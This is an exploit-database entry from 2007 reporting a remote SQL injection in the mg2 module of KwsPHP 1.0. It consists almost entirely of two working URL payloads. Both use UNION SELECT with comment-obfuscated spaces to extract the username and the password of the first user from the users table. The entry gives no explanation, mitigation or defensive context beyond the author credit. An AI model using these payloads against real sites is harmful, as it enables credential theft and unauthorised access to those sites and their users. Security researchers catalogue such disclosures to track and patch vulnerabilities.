KwsPHP 1.0 mg2 Module - SQL Injection

EDB-ID:

4528




Platform:

PHP

Date:

2007-10-13


--------------------

KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit

--------------------

Found : xoron

--------------------

Exploit:

Name:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pseudo,3,4,5/**/from/**/users/**/where/**/id=1/*

Pass:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pass,3,4,5/**/from/**/users/**/where/**/id=1/*

--------------------

Bundan sonra hep tek, hep yek xoron..!

--------------------

# milw0rm.com [2007-10-13]